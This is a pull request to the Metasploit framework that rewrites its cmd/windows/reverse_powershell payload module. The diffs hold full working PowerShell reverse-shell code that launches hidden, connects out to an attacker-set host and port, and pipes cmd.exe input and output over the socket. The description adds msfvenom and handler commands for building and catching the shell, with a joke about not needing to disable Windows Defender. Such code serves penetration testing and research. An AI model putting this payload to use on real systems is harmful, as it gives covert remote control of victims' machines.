### PR TITLE
fix #12579, fix the cmd/windows/reverse_powershell payload

### DIFF
--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1060
+  CachedSize = 1160
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -69,14 +69,14 @@ $p.StartInfo.FileName='cmd.exe';
 $p.StartInfo.RedirectStandardInput=1;
 $p.StartInfo.RedirectStandardOutput=1;
 $p.StartInfo.UseShellExecute=0;
-$p.Start();
+$q=$p.Start();
 $is=$p.StandardInput;
 $os=$p.StandardOutput;
-$osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+$osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);
 $c.connect($a,$b);
 $s=$c.GetStream();
-$s.ReadTimeout = 1000;
 while ($true) {
+    start-sleep -m 100;
     if ($osread.IsCompleted -and $osread.Result -ne 0) {
       $s.Write($ob,0,$osread.Result);
       $s.Flush();
@@ -91,7 +91,7 @@ while ($true) {
           $is.write($str);
       }
     }
-    if ($c.Connected -eq $false) {
+    if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) {
         break;
     };
     if ($p.ExitCode -ne $null) {

--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1160
+  CachedSize = 1481
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -63,16 +63,20 @@ $b=#{lport};
 $c=New-Object system.net.sockets.tcpclient;
 $nb=New-Object System.Byte[] $c.ReceiveBufferSize;
 $ob=New-Object System.Byte[] 65536;
-$e=new-object System.Text.AsciiEncoding;
+$eb=New-Object System.Byte[] 65536;
+$e=new-object System.Text.UTF8Encoding;
 $p=New-Object System.Diagnostics.Process;
 $p.StartInfo.FileName='cmd.exe';
 $p.StartInfo.RedirectStandardInput=1;
 $p.StartInfo.RedirectStandardOutput=1;
+$p.StartInfo.RedirectStandardError=1;
 $p.StartInfo.UseShellExecute=0;
 $q=$p.Start();
 $is=$p.StandardInput;
 $os=$p.StandardOutput;
+$es=$p.StandardError;
 $osread=$os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+$esread=$es.BaseStream.ReadAsync($eb, 0, $eb.Length);
 $c.connect($a,$b);
 $s=$c.GetStream();
 while ($true) {
@@ -81,6 +85,11 @@ while ($true) {
       $s.Write($ob,0,$osread.Result);
       $s.Flush();
       $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+    }
+    if ($esread.IsCompleted -and $esread.Result -ne 0) {
+      $s.Write($eb,0,$esread.Result);
+      $s.Flush();
+      $esread = $es.BaseStream.ReadAsync($eb, 0, $eb.Length);
     }
     if ($s.DataAvailable) {
       $r=$s.Read($nb,0,$nb.Length);

--- a/modules/payloads/singles/cmd/windows/reverse_powershell.rb
+++ b/modules/payloads/singles/cmd/windows/reverse_powershell.rb
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options'
 
 module MetasploitModule
 
-  CachedSize = 1228
+  CachedSize = 1060
 
   include Msf::Payload::Single
   include Msf::Sessions::CommandShellOptions
@@ -57,45 +57,48 @@ module MetasploitModule
   def command_string
     lhost = datastore['LHOST']
     lport = datastore['LPORT']
-    powershell = "function RSC{"\
-          "if ($c.Connected -eq $true) {$c.Close()};"\
-          "if ($p.ExitCode -ne $null) {$p.Close()};"\
-          "exit;"\
-        "};"\
-        "$a='#{lhost}';$p='#{lport}';$c=New-Object system.net.sockets.tcpclient;"\
-        "$c.connect($a,$p);$s=$c.GetStream();"\
-        "$nb=New-Object System.Byte[] $c.ReceiveBufferSize;"\
-        "$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';"\
-        "$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;"\
-        "$p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput;"\
-        "$os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding;"\
-        "while($os.Peek() -ne -1){"\
-          "$o += $e.GetString($os.Read())"\
-        "};"\
-        "$s.Write($e.GetBytes($o),0,$o.Length);"\
-        "$o=$null;$d=$false;$t=0;"\
-        "while (-not $d) {"\
-          "if ($c.Connected -ne $true) {RSC};"\
-          "$pos=0;$i=1; "\
-          "while (($i -gt 0) -and ($pos -lt $nb.Length)) {"\
-            "$r=$s.Read($nb,$pos,$nb.Length - $pos);"\
-            "$pos+=$r;"\
-            "if (-not $pos -or $pos -eq 0) {RSC};"\
-            "if ($nb[0..$($pos-1)] -contains 10) {break}};"\
-            "if ($pos -gt 0){"\
-              "$str=$e.GetString($nb,0,$pos);"\
-              "$is.write($str);start-sleep 1;"\
-              "if ($p.ExitCode -ne $null){RSC}else{"\
-                "$o=$e.GetString($os.Read());"\
-                "while($os.Peek() -ne -1){"\
-                  "$o += $e.GetString($os.Read());"\
-                  "if ($o -eq $str) {$o=''}"\
-                "};"\
-                "$s.Write($e.GetBytes($o),0,$o.length);"\
-                "$o=$null;"\
-                "$str=$null"\
-              "}"\
-            "}else{RSC}};"\
+    powershell = %Q^
+$a='#{lhost}';
+$b=#{lport};
+$c=New-Object system.net.sockets.tcpclient;
+$nb=New-Object System.Byte[] $c.ReceiveBufferSize;
+$ob=New-Object System.Byte[] 65536;
+$e=new-object System.Text.AsciiEncoding;
+$p=New-Object System.Diagnostics.Process;
+$p.StartInfo.FileName='cmd.exe';
+$p.StartInfo.RedirectStandardInput=1;
+$p.StartInfo.RedirectStandardOutput=1;
+$p.StartInfo.UseShellExecute=0;
+$p.Start();
+$is=$p.StandardInput;
+$os=$p.StandardOutput;
+$osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+$c.connect($a,$b);
+$s=$c.GetStream();
+$s.ReadTimeout = 1000;
+while ($true) {
+    if ($osread.IsCompleted -and $osread.Result -ne 0) {
+      $s.Write($ob,0,$osread.Result);
+      $s.Flush();
+      $osread = $os.BaseStream.ReadAsync($ob, 0, $ob.Length);
+    }
+    if ($s.DataAvailable) {
+      $r=$s.Read($nb,0,$nb.Length);
+      if ($r -lt 1) {
+          break;
+      } else {
+          $str=$e.GetString($nb,0,$r);
+          $is.write($str);
+      }
+    }
+    if ($c.Connected -eq $false) {
+        break;
+    };
+    if ($p.ExitCode -ne $null) {
+        break;
+    };
+};
+^.gsub!("\n", "")
 
     "powershell -w hidden -nop -c #{powershell}"
   end


### PR DESCRIPTION
This pull request fixes the cmd/windows/reverse_powershell payload so that it can pass output data to the socket asynchronously.

At the time of writing you do not need to disable Windows defender :trollface: (until you do session -u) 

## Verification

- [x] Ensure cmd_exec tests pass:
```
use exploit/multi/handler
set LHOST 192.168.56.1
set LPORT 4444
set ExitOnSession false
set payload windows/powershell_reverse_tcp
run -jz

# Get a session on Windows:
# msfvenom -p cmd/windows/reverse_powershell LHOST=192.168.56.1 LPORT=4444 -o powershell.bat 

loadpath test/modules
use post/test/cmd_exec
set SESSION -1
set VERBOSE true
run
```

- [x] Ensure `session -u 1` works now
- [x] Check the payload is still stable (e.g no 100% cpu usage, killing cmd.exe kills the session, killing the socket kills cmd.exe, etc)
